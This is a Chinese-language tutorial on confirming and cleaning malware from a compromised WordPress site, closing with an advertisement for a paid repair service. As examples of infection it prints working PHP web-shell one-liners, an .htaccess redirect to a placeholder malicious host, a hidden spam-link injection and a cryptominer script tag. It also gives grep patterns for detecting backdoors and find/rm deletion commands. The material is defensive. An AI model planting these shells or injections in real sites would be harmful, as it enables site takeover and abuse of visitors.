如何确认WordPress网站含有恶意代码?
在开始清除之前,先确认网站确实被感染:
方法1:在线扫描工具
- Sucuri SiteCheck(sitecheck.sucuri.net):免费在线扫描,检测已知恶意代码和黑名单状态
- Google Safe Browsing:在浏览器访问
https://transparencyreport.google.com/safe-browsing/search?url=你的域名 - VirusTotal:上传可疑文件或扫描URL
方法2:Google Search Console警告
访问 Search Console → 安全问题,如果出现:
– “已检测到黑客攻击内容”
– “恶意软件”
– “欺骗性网站”
则确认已被感染。
方法3:直接文件检查迹象
通过FTP查看以下迹象:
– wp-content/uploads/ 中存在 .php 文件(正常情况下这里只应有图片和媒体文件)
– 核心文件(index.php、wp-login.php等)最近修改时间异常
– 存在随机名称的 .php 文件(如 asd123.php)
恶意代码的常见类型和特征
类型1:PHP后门文件
最危险的类型,给黑客持续的访问入口:
<?php eval(base64_decode('ZWNobyAi...')); // 高度混淆的执行代码
<?php @eval($_POST['pass']); ?> // 接受POST参数执行任意代码
<?php system($_REQUEST['cmd']); ?> // 执行系统命令
<?php preg_replace('/.*/e', $_POST['x'], ''); ?> // PREG_REPLACE执行
识别特征:
– eval() + base64_decode() 组合
– system()、exec()、passthru() 接受GET/POST参数
– 大量随机变量名的混淆代码
类型2:跳转注入代码
通过在 .htaccess 或WordPress头部注入跳转代码:
# .htaccess跳转注入示例
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} (android|iphone|ipad) [NC]
RewriteRule .* http://malicious-site.com/ [R=302,L]
// functions.php注入的跳转
<?php if(!is_admin()){header("Location: http://spam-site.com");}?>
类型3:SEO垃圾注入
在数据库或文件中注入隐藏链接,不影响正常访问但会损害SEO:
// 注入隐藏链接
echo '<div style="display:none"><a href="http://spam.com">cheap drugs</a></div>';
类型4:加密挖矿脚本
利用访客浏览器CPU挖矿:
<script src="https://coin-hive.com/lib/coinhive.min.js"></script>
自助清除流程
准备工作
- 备份当前状态(包括被感染版本)
- 记录服务器信息:PHP版本、WordPress版本
- 准备FTP工具:FileZilla(免费)
- 准备phpMyAdmin访问:通过主机控制面板
第1步:全站恶意软件扫描
使用Wordfence:
WordPress后台 → Wordfence → Scan → Start New Scan
等待扫描完成(15-30分钟)
查看所有"Critical"级别的问题
使用命令行(SSH):
# 查找最近7天被修改的PHP文件
find /var/www/html -name "*.php" -newer /var/www/html/wp-config.php -print
# 查找包含eval(base64_decode的文件
grep -r "eval(base64_decode" /var/www/html --include="*.php" -l
# 查找包含后门特征的文件
grep -r "system\(\$_" /var/www/html --include="*.php" -l
grep -r "exec\(\$_" /var/www/html --include="*.php" -l
# 在uploads目录查找PHP文件(高可疑)
find /var/www/html/wp-content/uploads -name "*.php" -print
第2步:删除恶意文件
强烈建议:删除前先将可疑文件内容记录备份,用于后续入侵分析。
# 删除uploads目录中的PHP文件
find /var/www/html/wp-content/uploads -name "*.php" -delete
# 删除特定可疑文件
rm /var/www/html/wp-content/uploads/2024/12/suspicious.php
第3步:重置WordPress核心文件
# 下载对应版本的WordPress(以6.7为例)
cd /tmp
wget https://wordpress.org/wordpress-6.7.zip
unzip wordpress-6.7.zip
# 覆盖核心文件(不覆盖wp-content和wp-config.php)
cp -r /tmp/wordpress/wp-admin /var/www/html/
cp -r /tmp/wordpress/wp-includes /var/www/html/
cp /tmp/wordpress/wp-*.php /var/www/html/
第4步:清洁数据库
在phpMyAdmin中运行以下查询(调整表前缀):
-- 检查文章中的恶意内容
SELECT ID, post_title, LEFT(post_content, 100)
FROM wp_posts
WHERE post_content LIKE '%eval(%'
OR post_content LIKE '%base64_decode%'
OR post_content LIKE '%document.write%';
-- 检查未知管理员
SELECT u.user_login, u.user_email
FROM wp_users u
INNER JOIN wp_usermeta m ON u.ID = m.user_id
WHERE m.meta_key = 'wp_capabilities'
AND m.meta_value LIKE '%administrator%'
ORDER BY u.user_registered DESC;
-- 检查可疑options(常见恶意注入位置)
SELECT option_name, LEFT(option_value, 200)
FROM wp_options
WHERE option_value LIKE '%base64_decode%'
OR option_value LIKE '%eval(%'
OR option_value LIKE '%<script%';
第5步:清洁.htaccess
将.htaccess内容替换为干净版本:
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
第6步:修改所有密码和Secret Keys
// 在wp-config.php更新Authentication Keys
// 访问 https://api.wordpress.org/secret-key/1.1/salt/ 获取新的keys
define('AUTH_KEY', '新的随机值');
define('SECURE_AUTH_KEY', '新的随机值');
// ...等8个keys
更新完Secret Keys后,所有已登录用户会被强制退出重新登录。
什么时候需要专业帮助?
以下情况建议直接联系专业修复服务:
- 完全失去对网站的控制(无法登录后台、FTP)
- 服务器层面的入侵(不只是WordPress层面)
- 数据库被大规模篡改(删除内容、加密勒索)
- 修复多次仍复发(说明漏洞未被完全修复)
- 影响业务的紧急情况(外贸询盘中断、客户访问异常)
DyingWP提供专业WordPress黑客修复服务,48小时紧急响应,2000元起。修复完成提供完整入侵分析报告,并给出防复发方案。
常见问题
手动清除和使用安全插件清除哪个更彻底?
两者结合最彻底。安全插件(Wordfence、MalCare)可以快速找到大多数已知恶意代码模式;手动检查则能发现特殊混淆的后门文件和数据库注入。专业修复服务通常两者都用,再加上人工代码审查。
清除后多久会再次被黑?
如果只清除恶意代码而不修复漏洞,通常48-72小时内会再次被黑(攻击者的自动化脚本会持续尝试)。彻底修复需要:找出入侵路径、修复漏洞(更新插件/主题)、加固安全配置。